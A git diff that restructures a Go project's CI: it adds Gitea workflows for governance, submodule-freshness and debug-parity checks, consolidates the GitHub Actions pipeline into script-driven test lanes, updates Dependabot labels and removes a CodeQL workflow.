diff --git a/.gitea/workflows/ci-debug-parity.yml b/.gitea/workflows/ci-debug-parity.yml
new file mode 100644
index 000000000..8721b067d
--- /dev/null
+++ b/.gitea/workflows/ci-debug-parity.yml
@@ -0,0 +1,58 @@
+name: CI Debug Parity
+
+on:
+ pull_request:
+ branches:
+ - main
+ push:
+ branches:
+ - main
+ workflow_dispatch:
+
+jobs:
+ ci-debug:
+ runs-on: [self-hosted, general]
+ steps:
+ - name: Checkout
+ uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
+
+ - name: Setup Go
+ uses: actions/setup-go@44694675825211faa026b3c33043df3e48a5fa00 # v5.0.2
+ with:
+ go-version-file: go.mod
+
+ - name: Verify ci:debug parity contract
+ run: |
+ set -euo pipefail
+ make ci-verify-parity
+
+ - name: Setup Node.js
+ uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
+ with:
+ node-version: "24"
+
+ - name: Run npm ci:debug
+ env:
+ CI: "true"
+ GITEA_ACTIONS: "true"
+ run: |
+ set -euo pipefail
+ npm run ci:debug --silent
+
+ - name: Print ci:debug artifacts
+ if: always()
+ run: |
+ set -euo pipefail
+ test -f outputs/ci/debug/report.json && cat outputs/ci/debug/report.json || true
+ test -f outputs/ci/debug/metrics.prom && cat outputs/ci/debug/metrics.prom || true
+ test -f outputs/ci/governance-propagation-coverage/coverage.txt && cat outputs/ci/governance-propagation-coverage/coverage.txt || true
+
+ - name: Alert on ci:debug failure details
+ if: always()
+ run: |
+ set -euo pipefail
+ if ! command -v python3 >/dev/null 2>&1; then
+ echo "::warning::python3 unavailable; skipping ci:debug alert extraction"
+ exit 0
+ fi
+ python3 scripts/ci/report-alert.py ci-debug outputs/ci/debug/report.json
diff --git a/.gitea/workflows/governance-check.yml b/.gitea/workflows/governance-check.yml
new file mode 100644
index 000000000..633a3be9c
--- /dev/null
+++ b/.gitea/workflows/governance-check.yml
@@ -0,0 +1,74 @@
+name: Governance Check
+
+on:
+ workflow_dispatch:
+ schedule:
+ - cron: "43 3 * * *"
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ governance:
+ runs-on: [self-hosted, general]
+ steps:
+ - name: Checkout
+ uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
+
+ - name: Init submodules (HTTPS with token)
+ env:
+ GITEA_TOKEN: ${{ secrets.GITEA_TOKEN }}
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ set -euo pipefail
+ git config --local url."http://vhost7:8167/".insteadOf "ssh://git@vhost7:9001/"
+
+ TOKEN="${GITEA_TOKEN:-${GITHUB_TOKEN:-}}"
+ if [[ -n "${TOKEN}" ]]; then
+ git config --local http.http://vhost7:8167/.extraheader "Authorization: token ${TOKEN}"
+ fi
+
+ if git submodule update --init --recursive 2>&1; then
+ echo "SUBMODULE_INIT=success"
+ else
+ echo "WARN: submodule init failed; governance wrapper will report actionable status"
+ echo "SUBMODULE_INIT=failed"
+ fi
+
+ - name: Run governance unit tests (70%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-governance-unit.sh
+
+ - name: Run governance integration tests (20%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-governance-integration.sh
+
+ - name: Run governance e2e tests (10%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-governance-e2e.sh
+
+ - name: Verify governance wiring
+ env:
+ GOVERNANCE_REPORT_JSON: outputs/ci/governance/report.json
+ GOVERNANCE_METRICS_TEXTFILE: outputs/ci/governance/metrics.prom
+ run: |
+ set -euo pipefail
+ chmod +x scripts/check-governance.sh
+ ./scripts/check-governance.sh
+
+ - name: Print governance report and metrics
+ if: always()
+ run: |
+ set -euo pipefail
+ test -f outputs/ci/governance/report.json && cat outputs/ci/governance/report.json || true
+ test -f outputs/ci/governance/metrics.prom && cat outputs/ci/governance/metrics.prom || true
+ test -f outputs/ci/governance/events.jsonl && cat outputs/ci/governance/events.jsonl || true
+
+ - name: Alert on governance outcome
+ if: always()
+ run: |
+ set -euo pipefail
+ python3 scripts/ci/report-alert.py governance outputs/ci/governance/report.json
diff --git a/.gitea/workflows/submodule-freshness.yml b/.gitea/workflows/submodule-freshness.yml
new file mode 100644
index 000000000..c87b68dd7
--- /dev/null
+++ b/.gitea/workflows/submodule-freshness.yml
@@ -0,0 +1,85 @@
+name: Submodule Freshness Check
+
+on:
+ workflow_dispatch:
+ inputs:
+ auto_update:
+ description: "Automatically bump stale prompts submodule in workflow workspace"
+ required: false
+ default: "false"
+ schedule:
+ - cron: "17 */6 * * *"
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ submodule-freshness:
+ runs-on: [self-hosted, general]
+ steps:
+ - name: Checkout
+ uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
+
+ - name: Init submodules (HTTPS with token)
+ env:
+ GITEA_TOKEN: ${{ secrets.GITEA_TOKEN }}
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ set -euo pipefail
+ # Rewrite SSH URLs to HTTPS for CI runner auth.
+ # CI runners lack SSH keys but can use token-based HTTPS.
+ # See: https://forum.gitea.com/t/gitea-runner-recursive-checkout/10812
+ git config --local url."http://vhost7:8167/".insteadOf "ssh://git@vhost7:9001/"
+
+ # Use available token for HTTPS auth
+ TOKEN="${GITEA_TOKEN:-${GITHUB_TOKEN:-}}"
+ if [[ -n "${TOKEN}" ]]; then
+ git config --local http.http://vhost7:8167/.extraheader "Authorization: token ${TOKEN}"
+ fi
+
+ # Init submodules; continue even if clone fails (script handles gracefully)
+ if git submodule update --init --recursive 2>&1; then
+ echo "SUBMODULE_INIT=success"
+ else
+ echo "WARN: submodule init failed; freshness script will handle gracefully"
+ echo "SUBMODULE_INIT=failed"
+ fi
+
+ - name: Run submodule freshness unit tests (70%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-submodule-freshness-unit.sh
+
+ - name: Run submodule freshness integration tests (20%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-submodule-freshness-integration.sh
+
+ - name: Run submodule freshness e2e tests (10%)
+ run: |
+ set -euo pipefail
+ bash test/ci/test-submodule-freshness-e2e.sh
+
+ - name: Verify prompts freshness
+ env:
+ AUTO_UPDATE: ${{ inputs.auto_update || 'false' }}
+ STRICT_REMOTE: auto
+ SUBMODULE_REPORT_JSON: outputs/ci/submodule-freshness/report.json
+ SUBMODULE_METRICS_TEXTFILE: outputs/ci/submodule-freshness/metrics.prom
+ run: |
+ set -euo pipefail
+ chmod +x scripts/prompts-submodule-freshness.sh
+ ./scripts/prompts-submodule-freshness.sh
+
+ - name: Print freshness report and metrics
+ if: always()
+ run: |
+ set -euo pipefail
+ test -f outputs/ci/submodule-freshness/report.json && cat outputs/ci/submodule-freshness/report.json || true
+ test -f outputs/ci/submodule-freshness/metrics.prom && cat outputs/ci/submodule-freshness/metrics.prom || true
+
+ - name: Alert on stale or failed freshness outcomes
+ if: always()
+ run: |
+ set -euo pipefail
+ python3 scripts/ci/report-alert.py submodule-freshness outputs/ci/submodule-freshness/report.json
diff --git a/.github/actions/setup-go-env/action.yml b/.github/actions/setup-go-env/action.yml
new file mode 100644
index 000000000..b404510cd
--- /dev/null
+++ b/.github/actions/setup-go-env/action.yml
@@ -0,0 +1,44 @@
+# Reusable composite action: Set up Go + CGO dependencies
+# Last Updated: 2026-02-22
+
+name: "Setup Go Environment"
+description: "Set up Go toolchain and install CGO library dependencies"
+
+runs:
+ using: "composite"
+ steps:
+ - name: Ensure /dev character devices before apt
+ shell: bash
+ run: |
+ set -euo pipefail
+ ensure_char_device() {
+ local path="$1" major="$2" minor="$3"
+ if [[ -c "${path}" ]] && echo "probe" > "${path}" 2>/dev/null; then
+ return 0
+ fi
+ echo "Repairing ${path} before dependency install"
+ sudo rm -f "${path}" 2>/dev/null || true
+ sudo mknod -m 666 "${path}" c "${major}" "${minor}"
+ }
+ ensure_char_device /dev/null 1 3
+ ensure_char_device /dev/zero 1 5
+
+ - name: Set up Go
+ uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ with:
+ go-version-file: go.mod
+ cache: true
+
+ - name: Install CGO library dependencies
+ shell: bash
+ run: |
+ sudo apt-get update -qq
+ sudo apt-get install -y -qq \
+ librados-dev \
+ librbd-dev \
+ libcephfs-dev \
+ libvirt-dev
+
+ - name: Download Go module dependencies
+ shell: bash
+ run: go mod download
diff --git a/.github/dependabot.yml b/.github/dependabot.yml
index 98c7b8f56..848d167fb 100644
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -1,21 +1,6 @@
-# dependabot.yml
-
-# Specify the version of Dependabot configuration
-
-# To get started with Dependabot version updates, you'll need to specify which
-# package ecosystems to update and where the package manifests are located.
-# Please see the documentation for all configuration options:
-# https://docs.github.com/code-security/dependabot/dependabot-version-updates/configuration-options-for-the-dependabot.yml-file
-
-version: 2
-updates:
- - package-ecosystem: "" # See documentation for possible values
- directory: "/" # Location of package manifests
- schedule:
- interval: "weekly"
-# Define the updates configuration
-# Removed misplaced 'updates' section. Dependabot configuration should be in a separate dependabot.yml file.
-
+# dependabot.yml - Automated dependency updates
+# Last Updated: 2026-02-19
+# Documentation: https://docs.github.com/code-security/dependabot/dependabot-version-updates
version: 2
updates:
@@ -23,11 +8,21 @@ updates:
directory: "/"
schedule:
interval: "weekly"
+ labels:
+ - "dependencies"
+ - "go"
+
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
+ labels:
+ - "dependencies"
+ - "ci"
+
- package-ecosystem: "docker"
directory: "/"
schedule:
interval: "weekly"
+ labels:
+ - "dependencies"
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 2bb2f3f6d..bf07c836c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,3 +1,6 @@
+# ci.yml - Consolidated CI pipeline
+# Last Updated: 2026-02-22
+
name: CI
on:
@@ -9,180 +12,476 @@ on:
schedule:
- cron: "0 3 * * *"
-env:
- GO_VERSION: "1.25.x"
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
jobs:
- ci-unit:
- name: ci-unit
+ ci-debug-parity:
+ name: ci-debug-parity
runs-on: ubuntu-latest
- timeout-minutes: 45
+ timeout-minutes: 20
+ permissions:
+ contents: read
steps:
- - name: Checkout
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
- - name: Set up Go
- uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ - name: Setup Node.js
+ uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
with:
- go-version: ${{ env.GO_VERSION }}
- cache: true
-
- - name: Download dependencies
- run: go mod download
-
- - name: Run unit tests with race and coverage
- run: go test -short -race -coverprofile=unit.coverage.out -covermode=atomic ./pkg/...
-
- - name: Run backup-focused unit tests with coverage
- run: go test -short -race -coverprofile=backup.unit.coverage.out -covermode=atomic ./pkg/backup/...
-
- - name: Enforce unit coverage >= 70%
- run: |
- COVERAGE=$(go tool cover -func=unit.coverage.out | awk '/^total:/ {gsub("%","",$3); print $3}')
- echo "Unit coverage: ${COVERAGE}%"
- awk "BEGIN {exit !($COVERAGE >= 70)}" || (echo "Coverage below 70%" && exit 1)
-
- - name: Flaky retry summary
- run: |
- set +e
- OUT=flaky-summary.txt
- echo "Flakiness retry summary" > "$OUT"
- echo "" >> "$OUT"
- PACKAGES=(
- "./pkg/httpclient"
- "./pkg/apiclient"
- "./pkg/hecate/api"
- )
- FAIL=0
- for PKG in "${PACKAGES[@]}"; do
- echo "Testing ${PKG} 3x..." | tee -a "$OUT"
- if go test -count=3 -race "${PKG}" >> "$OUT" 2>&1; then
- echo " stable" | tee -a "$OUT"
- else
- echo " flaky_or_failing" | tee -a "$OUT"
- FAIL=1
- fi
- echo "" >> "$OUT"
- done
- if [ "$FAIL" -ne 0 ]; then
- echo "Flaky retry summary found failures"
- cat "$OUT"
- exit 1
- fi
+ node-version: "24"
+
+ - name: Run npm ci:debug
+ env:
+ CI: "true"
+ run: npm run ci:debug --silent
- - name: Upload unit artifacts
+ - name: Print ci:debug report
if: always()
- uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4
+ run: |
+ test -f outputs/ci/debug/report.json && cat outputs/ci/debug/report.json || true
+ test -f outputs/ci/governance/report.json && cat outputs/ci/governance/report.json || true
+ test -f outputs/ci/governance-propagation-coverage/coverage.json && cat outputs/ci/governance-propagation-coverage/coverage.json || true
+
+ - name: Alert on governance wrapper report
+ if: always()
+ run: |
+ python3 scripts/ci/report-alert.py governance outputs/ci/governance/report.json
+ python3 scripts/ci/report-alert.py shell-coverage outputs/ci/governance-propagation-coverage/coverage.json
+
+ - name: Upload ci:debug artifacts
+ if: always()
+ uses: actions/upload-artifact@65462800fd760344b1a7b4382951275a0abb4808
with:
- name: ci-unit-artifacts
+ name: ci-debug-artifacts
path: |
- unit.coverage.out
- backup.unit.coverage.out
- flaky-summary.txt
+ outputs/ci/debug/**
+ outputs/ci/governance/**
+ outputs/ci/governance-propagation-coverage/**
+ if-no-files-found: warn
+
+ ci-self-update-quality:
+ name: ci-self-update-quality
+ runs-on: ubuntu-latest
+ timeout-minutes: 30
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Setup Node.js
+ uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020
+ with:
+ node-version: "24"
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: Run self-update quality lane
+ run: npm run ci:self-update-quality --silent
+
+ - name: Summarize self-update quality lane
+ if: always()
+ env:
+ CI_LANE: self-update-quality
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/self-update-quality
+ CI_COVERAGE_FILE: outputs/ci/self-update-quality/coverage.out
+ CI_REPORT_FILE: outputs/ci/self-update-quality/report.json
+ CI_SUMMARY_FILE: outputs/ci/self-update-quality/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle self-update quality artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/self-update-quality-artifacts.tgz -C outputs/ci self-update-quality || true
+ ls -lh outputs/ci/self-update-quality-artifacts.tgz || true
+
+ - name: Print self-update quality report
+ if: always()
+ run: |
+ test -f outputs/ci/self-update-quality/report.json && cat outputs/ci/self-update-quality/report.json || true
+
+ - name: Alert on self-update quality failure details
+ if: always()
+ run: |
+ set -euo pipefail
+ report="outputs/ci/self-update-quality/report.json"
+ if [[ ! -f "${report}" ]]; then
+ echo "::warning::self-update-quality report missing"
+ exit 0
+ fi
+ python3 - <<'PY' "${report}"
+import json
+import sys
+from pathlib import Path
+
+report = Path(sys.argv[1])
+data = json.loads(report.read_text(encoding="utf-8"))
+status = data.get("status", "unknown")
+if status == "pass":
+ print("self-update-quality status=pass")
+ raise SystemExit(0)
+
+stage = data.get("stage", "unknown")
+failed_command = data.get("failed_command", "unknown")
+coverage = data.get("coverage_percent", "n/a")
+message = data.get("message", "unknown")
+print(f"::error::self-update-quality failed stage={stage} command={failed_command} coverage={coverage} message={message}")
+PY
+
+ lint:
+ name: lint
+ runs-on: ubuntu-latest
+ timeout-minutes: 15
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
+
+ - name: Install golangci-lint
+ run: go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.0.0
+
+ - name: Run lint lane
+ env:
+ CI_EVENT_NAME: ${{ github.event_name }}
+ CI_BASE_REF: ${{ github.base_ref }}
+ run: |
+ if [ "${CI_EVENT_NAME}" = "pull_request" ]; then
+ scripts/ci/lint.sh changed
+ else
+ scripts/ci/lint.sh all
+ fi
+
+ - name: Summarize lint lane
+ if: always()
+ env:
+ CI_LANE: lint
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/lint
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/lint/report.json
+ CI_SUMMARY_FILE: outputs/ci/lint/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle lint artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/lint-artifacts.tgz -C outputs/ci lint || true
+ ls -lh outputs/ci/lint-artifacts.tgz || true
+
+ - name: Print lint report
+ if: always()
+ run: |
+ test -f outputs/ci/lint/report.json && cat outputs/ci/lint/report.json || true
+
+ ci-unit:
+ name: ci-unit
+ runs-on: ubuntu-latest
+ timeout-minutes: 40
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
+
+ - name: Run unit lane
+ env:
+ CI_EVENT_NAME: ${{ github.event_name }}
+ CI_BASE_REF: ${{ github.base_ref }}
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh unit
+
+ - name: Summarize unit lane
+ if: always()
+ env:
+ CI_LANE: unit
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/unit
+ CI_COVERAGE_FILE: outputs/ci/unit/coverage.out
+ CI_REPORT_FILE: outputs/ci/unit/report.json
+ CI_SUMMARY_FILE: outputs/ci/unit/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle unit artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/unit-artifacts.tgz -C outputs/ci unit || true
+ ls -lh outputs/ci/unit-artifacts.tgz || true
+
+ - name: Print unit report
+ if: always()
+ run: |
+ test -f outputs/ci/unit/report.json && cat outputs/ci/unit/report.json || true
+
+ ci-deps-unit:
+ name: ci-deps-unit
+ runs-on: ubuntu-latest
+ timeout-minutes: 20
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
+
+ - name: Run dependency-focused unit lane
+ env:
+ CI_EVENT_NAME: ${{ github.event_name }}
+ CI_BASE_REF: ${{ github.base_ref }}
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh deps-unit
+
+ - name: Summarize dependency-focused unit lane
+ if: always()
+ env:
+ CI_LANE: deps-unit
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/deps-unit
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/deps-unit/report.json
+ CI_SUMMARY_FILE: outputs/ci/deps-unit/summary.md
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/summary.sh
+
+ - name: Bundle dependency-focused unit artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/deps-unit-artifacts.tgz -C outputs/ci deps-unit || true
+ ls -lh outputs/ci/deps-unit-artifacts.tgz || true
+
+ - name: Print dependency-focused unit report
+ if: always()
+ run: |
+ test -f outputs/ci/deps-unit/report.json && cat outputs/ci/deps-unit/report.json || true
ci-integration:
name: ci-integration
runs-on: ubuntu-latest
timeout-minutes: 45
- services:
- vault:
- image: hashicorp/vault:1.16
- env:
- VAULT_DEV_ROOT_TOKEN_ID: test-token
- VAULT_DEV_LISTEN_ADDRESS: 0.0.0.0:8200
- ports:
- - 8200:8200
- options: >-
- --cap-add=IPC_LOCK
- postgres:
- image: postgres:15
- env:
- POSTGRES_PASSWORD: testpass
- POSTGRES_DB: testdb
- ports:
- - 5432:5432
- options: >-
- --health-cmd "pg_isready -U postgres"
- --health-interval 10s
- --health-timeout 5s
- --health-retries 10
+ permissions:
+ contents: read
steps:
- - name: Checkout
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
-
- - name: Set up Go
- uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
- go-version: ${{ env.GO_VERSION }}
- cache: true
+ fetch-depth: 0
- - name: Download dependencies
- run: go mod download
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
- - name: Wait for Vault
- run: |
- for i in $(seq 1 30); do
- if curl -sf http://127.0.0.1:8200/v1/sys/health >/dev/null; then
- echo "Vault is ready"
- exit 0
- fi
- sleep 2
- done
- echo "Vault failed to start"
- exit 1
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
- - name: Run integration test suite
+ - name: Run integration lane
env:
- VAULT_ADDR: http://127.0.0.1:8200
- VAULT_TOKEN: test-token
- POSTGRES_URL: postgres://postgres:testpass@localhost:5432/testdb?sslmode=disable
+ CI_EVENT_NAME: ${{ github.event_name }}
+ CI_BASE_REF: ${{ github.base_ref }}
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh integration
+
+ - name: Summarize integration lane
+ if: always()
+ env:
+ CI_LANE: integration
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/integration
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/integration/report.json
+ CI_SUMMARY_FILE: outputs/ci/integration/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle integration artifacts
+ if: always()
run: |
- go test -v -timeout=15m ./test/integration_test.go ./test/integration_scenarios_test.go
- # Backup integration layer (20% test pyramid allocation for backup workflow)
- go test -v -timeout=15m -run Integration ./pkg/backup/...
- go test -v -timeout=15m -tags=integration ./pkg/vault/...
+ tar -czf outputs/ci/integration-artifacts.tgz -C outputs/ci integration || true
+ ls -lh outputs/ci/integration-artifacts.tgz || true
+
+ - name: Print integration report
+ if: always()
+ run: |
+ test -f outputs/ci/integration/report.json && cat outputs/ci/integration/report.json || true
ci-e2e-smoke:
name: ci-e2e-smoke
runs-on: ubuntu-latest
timeout-minutes: 20
+ permissions:
+ contents: read
steps:
- - name: Checkout
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
- - name: Set up Go
- uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
+
+ - name: Run e2e smoke lane
+ env:
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh e2e-smoke
+
+ - name: Summarize e2e smoke lane
+ if: always()
+ env:
+ CI_LANE: e2e-smoke
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/e2e-smoke
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/e2e-smoke/report.json
+ CI_SUMMARY_FILE: outputs/ci/e2e-smoke/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle e2e smoke artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/e2e-smoke-artifacts.tgz -C outputs/ci e2e-smoke || true
+ ls -lh outputs/ci/e2e-smoke-artifacts.tgz || true
+
+ - name: Print e2e smoke report
+ if: always()
+ run: |
+ test -f outputs/ci/e2e-smoke/report.json && cat outputs/ci/e2e-smoke/report.json || true
+
+ ci-fuzz:
+ name: ci-fuzz
+ runs-on: ubuntu-latest
+ timeout-minutes: 15
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
- go-version: ${{ env.GO_VERSION }}
- cache: true
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
- - name: Download dependencies
- run: go mod download
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
- - name: Run smoke e2e tests
- run: go test -v -tags=e2e_smoke -timeout=10m ./test/e2e/smoke/...
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
- - name: Run backup e2e smoke tests
+ - name: Run fuzz lane
+ env:
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh fuzz
+
+ - name: Summarize fuzz lane
+ if: always()
+ env:
+ CI_LANE: fuzz
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/fuzz
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/fuzz/report.json
+ CI_SUMMARY_FILE: outputs/ci/fuzz/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle fuzz artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/fuzz-artifacts.tgz -C outputs/ci fuzz || true
+ ls -lh outputs/ci/fuzz-artifacts.tgz || true
+
+ - name: Print fuzz report
+ if: always()
run: |
- # Backup e2e layer (10% test pyramid allocation for backup workflow)
- go test -v -tags=e2e_smoke -timeout=10m -run Backup ./test/e2e/smoke/...
+ test -f outputs/ci/fuzz/report.json && cat outputs/ci/fuzz/report.json || true
ci-e2e-full:
name: ci-e2e-full
if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch'
runs-on: ubuntu-latest
timeout-minutes: 90
+ permissions:
+ contents: read
steps:
- - name: Checkout
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
-
- - name: Set up Go
- uses: actions/setup-go@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
- go-version: ${{ env.GO_VERSION }}
- cache: true
+ fetch-depth: 0
+
+ - name: Setup Go environment
+ uses: ./.github/actions/setup-go-env
+
+ - name: Validate CI policy
+ run: go run ./test/ci/tool policy-validate test/ci/suites.yaml
+
+ - name: CI preflight
+ run: scripts/ci/preflight.sh
- - name: Run full e2e tests (guarded)
+ - name: Run e2e full lane
env:
- EOS_E2E_FULL_APPROVED: "true"
- run: go test -v -tags=e2e_full -timeout=60m ./test/e2e/full/...
+ CI_SUITE_FILE: test/ci/suites.yaml
+ run: scripts/ci/test.sh e2e-full
+
+ - name: Summarize e2e full lane
+ if: always()
+ env:
+ CI_LANE: e2e-full
+ CI_STATUS: ${{ job.status }}
+ CI_LOG_DIR: outputs/ci/e2e-full
+ CI_COVERAGE_FILE: "-"
+ CI_REPORT_FILE: outputs/ci/e2e-full/report.json
+ CI_SUMMARY_FILE: outputs/ci/e2e-full/summary.md
+ run: scripts/ci/summary.sh
+
+ - name: Bundle e2e full artifacts
+ if: always()
+ run: |
+ tar -czf outputs/ci/e2e-full-artifacts.tgz -C outputs/ci e2e-full || true
+ ls -lh outputs/ci/e2e-full-artifacts.tgz || true
+
+ - name: Print e2e full report
+ if: always()
+ run: |
+ test -f outputs/ci/e2e-full/report.json && cat outputs/ci/e2e-full/report.json || true
diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml
deleted file mode 100644
index 66ee45a2f..000000000
--- a/.github/workflows/codeql.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-name: "CodeQL Security Analysis"
-
-on:
- push:
- branches: [ main, develop ]
- pull_request:
- branches: [ main, develop ]
- schedule:
- # Run CodeQL analysis daily at 3 AM UTC for comprehensive security scanning
- - cron: '0 3 * * *'
-
-jobs:
- analyze:
- name: CodeQL Security Analysis
- runs-on: ubuntu-latest
- timeout-minutes: 360
- permissions:
- actions: read
- contents: read
- security-events: write
-
- strategy:
- fail-fast: false
- matrix:
- language: [ 'go' ]
-
- steps:
- - name: Checkout repository
- uses: actions/checkout@v4
-
- - name: Set up Go
- uses: actions/setup-go@v5
- with:
- go-version: '1.25'
- cache: true
-
- - name: Cache Go modules
- uses: actions/cache@v4
- with:
- path: |
- ~/.cache/go-build
- ~/go/pkg/mod
- key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }}
- restore-keys: |
- ${{ runner.os }}-go-
-
- - name: Initialize CodeQL
- uses: github/codeql-action/init@v3
- with:
- languages: ${{ matrix.language }}
- config-file: ./.github/codeql/codeql-config.yml
- queries: +security-and-quality,security-experimental
-
- - name: Download dependencies
- run: |
- go mod download
- go mod verify
-
- - name: Build project for CodeQL analysis
- run: |
- # Build all packages to ensure comprehensive analysis
- go build -v ./...
- # Build main application
- go build -o eos-build ./cmd/
-
- - name: Perform CodeQL Analysis
- uses: github/codeql-action/analyze@v3
- with:
- category: "/language:${{matrix.language}}"
- upload: true
-
- - name: Upload CodeQL results as artifact
- uses: actions/upload-artifact@v5
- if: always()
- with:
- name: codeql-results-${{ matrix.language }}
- path: /home/runner/work/_temp/codeql_databases/
\ No newline at end of file
diff --git a/.github/workflows/emoji-check.yml b/.github/workflows/emoji-check.yml
deleted file mode 100644
